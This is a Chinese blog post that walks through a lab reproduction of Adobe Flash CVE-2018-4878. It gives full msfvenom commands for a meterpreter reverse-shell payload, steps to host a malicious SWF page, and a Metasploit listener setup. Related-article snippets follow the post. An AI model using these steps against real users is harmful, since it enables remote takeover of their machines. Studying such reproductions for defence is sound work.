[漏洞复现]Adobe flash player 28(CVE-2018-4878)

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量436 收藏
点赞数
文章标签: linux docker git java centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a854596855/article/details/114920119
版权

攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。

环境:

实验步骤

一、kali 使用 msfvenom 生成 shell 代码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt

msfvenom的用法可参考 https://www.jianshu.com/p/dee2b171a0a0
下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助。

二、生成swf和html

git clone  https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git

使用上面生成的payload替换cve-2018-4878.py中的payload

image.png

更改输出文件路径

更改输出文件的路径

执行cve-2018-4878.py,会生成两个文件

python cve-2018-4878.py
生成的文件

开启apache,将生成的两个文件拷贝到/var/www/html中

service apache2 start
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf

kali开启监听

#msfconsole启动
msfconsole
#使用handler监听模块  
msf > use exploit/multi/handler 
#回弹一个tcp连接  
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
#设置kali渗透机的ip地址  
msf exploit(handler) > set lhost 192.168.43.177
#设置监听端口,这个需跟上面msfvenom设置的端口一致  
msf exploit(handler) > set lport 8888 
#开启监听,等待靶机上线 
msf exploit(handler) > exploit
开启监听

靶机安装adobe flash player

image.png

访问 http://192.168.43.177/index2.html
image.png

kali getshell成功
image.png

meterpreter用法可参考 https://www.cnblogs.com/backlion/p/9484949.html

参考资料

https://blog.51cto.com/chenxinjie/2093653https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019/blob/master/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A.mdhttps://www.cnblogs.com/backlion/p/9484949.html

~巴哥~
关注
Flash漏洞CVE-2018-4878复现
玄道的网安博客
07-29 1397
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
利用Adobe Flash Player ActiveX控件绕过SafeSEH
Yx0051的博客
08-05 1361
其实思路就是利用程序加载模块之外的内存地址,找到一个跳板指令绕过SafeSEH,flash9.2.124以前是没有SafeSEH的。 这一次试验因为涉及,mfc控件的构建,由于我虚拟机环境是vs 2008 express版本的,所以没有办法创建这种工程,直接拿别人做好的ocx文件用了。 1、第一步就是创建ActiveX mfc工程,创建一个test函数,函数中包含一个字符串覆盖的漏洞,同时注意
flash-player-ppapi-28.0.0.137-release.x86_64.rpm
07-11
chrome中无法播放视频时候的flash问题, 能修复解决flash问题
fedora、centos、rhel安装Adobe Flash Player 28
weixin_30764883的博客
03-01 129
切换到root用户 添加Adobe Repository Adobe Repository 32-bit x86 rpm -ivh http://linuxdownload.adobe.com/adobe-release/adobe-release-i386-1.0-1.noarch.rpm rpm –import /etc/pki/rpm-...
flashActiveX_27.0.0.183.exe
10-28
Adobe Flash Player是一种广泛使用的、专有的多媒体程序播放器。它最初由Macromedia编写,在Macromedia被Adobe收购后由Adobe继续开发并分发。Adobe Flash Player 最初设计目的为播放2维向量动画,但至此之后成为适合开发创造丰富型互联网应用程序、流视频音频的工具。Flash Player使用矢量图形的技术来最小化文件的大小以及创造节省网络带宽和下载时间的文件。因此Flash 成为嵌入网页中的小游戏、动画以及图形用户界面常用的格式。
CVE-2018-15982 Adobe Flash Player 0day漏洞复现
玄道的网安博客
01-17 1334
0x00 前言 当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982和Adobe Flash Player installer中的高危漏洞CVE-2018-15983。   POC下载地址:https://github.com/B1eed/VulRec/blob/master/CVE-2018-1...
漏洞复现:CVE-2018-15982(Adobe Flash 0day)
RongChun的博客
01-04 655
漏洞概述: 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 受影响的版本: Adobe Flash Player...
Network penetration testing_Work5(Flash 0day CVE-2018-4878复现过程)
CLOVER的博客
12-13 2592
一:Loophole介绍 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。 从Adobe公告来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KRCERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会 被“远程代码执行”,并且直
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1295
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
flash安装程序
09-05
28.0flash安装软件包,完整版 经过完整测试 28.0flash安装软件包,完整版 经过完整测试
Flash Loader Demonstrator V2.8.0
05-27
Flash Loader Demonstrator V2.8.0 Flash Loader Demonstrator V2.8.0
flash29版本
10-15
flash29版本,安装的时候需要切断外网,否则会跳转至最新版本
Adobe Flash Player社工钓鱼
Fly_鹏程万里
10-27 615
本篇文章主要介绍如何通过利用Adobe Flash Player漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现"远程代码执行",并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现。
Flash 零日漏洞复现CVE-2018-4878
andiao1218的博客
03-15 221
项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137 攻击机器IP:192.168.220.152 目标靶机:192.168.220.151,浏览器为360浏览器 用msfvenom生成一个shellcode ┌─[root@sch01ar]─[...
cve-2018-4878漏洞复现
06-02 4633
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用&lt;&gt;标记出来,&lt;&gt;不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
CVE-2017-4878 漏洞复现Flash Player当前最新版本28.0.0.137以及之前的所有版本)
qq_39627497的博客
12-06 1366
CVE-2017-4878 漏洞复现 ** 漏洞介绍 ** 1、漏洞概述 Flash Player当前最新版本28.0.0.137以及之前的所有版本 2 漏洞复现环境: 渗透机:Kali Linux + POC代码 靶机:win7+IE8.0+FLASH player 为了节省时间直接在 GitHub上下载poc 代码 3 漏洞复现实验过程: 复制下载链接: git clone https://...
漏洞复现 CVE-2018-4878 Flash
weixin_44664530的博客
04-21 255
受影响版本 漏洞复现环境 Kali Linux Windows 7 sp1 cve-2018-4878.py flashplayer_activex_28.0.0.137.exe 工具自行下载 链接:https://pan.baidu.com/s/1Q-ryRThsdhsvOIc_Q5E9Bw 提取码:owad 环境配置 将flashplayer_activex_28.0.0.137.exe安装...
CVE-2018-4878漏洞利用与加固:实战远程控制教程
本资源是一份关于IT安全领域的课程文档,名为"E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf",主要关注于针对CVE-2018-4878漏洞的实战操作和漏洞利用技术。课程涉及以下几个关键知识点: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值